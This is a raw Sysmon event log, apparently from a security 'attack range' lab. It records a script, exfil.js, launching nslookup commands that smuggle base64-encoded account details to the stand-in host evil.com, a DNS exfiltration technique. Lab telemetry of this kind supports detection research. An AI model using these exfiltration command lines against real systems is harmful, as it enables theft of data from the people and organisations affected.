14:21:31.696{2E1864BB-18EB-629A-A043-000000005F02}77844232C:\Windows\system32\conhost.exe{2E1864BB-18EB-629A-9F43-000000005F02}7796C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208935Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.680{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EB-629A-A043-000000005F02}7784C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208934Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.680{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208933Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.680{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208932Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.680{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208931Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.680{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208930Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.680{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EB-629A-9F43-000000005F02}7796C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208929Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.680{2E1864BB-18E0-629A-6742-000000005F02}39767832C:\Windows\System32\WScript.exe{2E1864BB-18EB-629A-9F43-000000005F02}7796C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208928Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.683{2E1864BB-18EB-629A-9F43-000000005F02}7796C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlaio.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000208927Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.678{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlomlyj.tmpMD5=14EFE03E0C67AE598772AE00481DF4D7,SHA256=91A875FE4CE713F3E89451B0A4F3D74F67372C5460101AA4ED9323B82D4A430D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000208926Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.628{2E1864BB-18EB-629A-9D43-000000005F02}59046440C:\Windows\system32\conhost.exe{2E1864BB-18EB-629A-9E43-000000005F02}3864C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208925Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.628{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208924Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.628{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208923Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.628{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208922Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.628{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EB-629A-9E43-000000005F02}3864C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208921Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.628{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208920Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.612{2E1864BB-18EB-629A-9C43-000000005F02}81082172C:\Windows\system32\cmd.exe{2E1864BB-18EB-629A-9E43-000000005F02}3864C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208919Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.627{2E1864BB-18EB-629A-9E43-000000005F02}3864C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EB-629A-9C43-000000005F02}8108C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlomlyj.tmp 2>&1 10341000x8000000000000000208918Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.597{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EB-629A-9D43-000000005F02}5904C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208917Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.597{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EB-629A-9D43-000000005F02}5904C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208916Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.581{2E1864BB-18EB-629A-9D43-000000005F02}59046440C:\Windows\system32\conhost.exe{2E1864BB-18EB-629A-9C43-000000005F02}8108C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208915Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.581{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EB-629A-9D43-000000005F02}5904C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208914Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.577{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208913Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.576{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208912Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.576{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208911Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.576{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208910Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.576{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EB-629A-9C43-000000005F02}8108C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208909Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.575{2E1864BB-18E0-629A-6742-000000005F02}39766928C:\Windows\System32\WScript.exe{2E1864BB-18EB-629A-9C43-000000005F02}8108C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208908Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.575{2E1864BB-18EB-629A-9C43-000000005F02}8108C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlomlyj.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000208907Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.559{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlmara.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000208906Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.544{2E1864BB-18EB-629A-9A43-000000005F02}60643336C:\Windows\system32\conhost.exe{2E1864BB-18EB-629A-9B43-000000005F02}5592C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208905Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.544{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 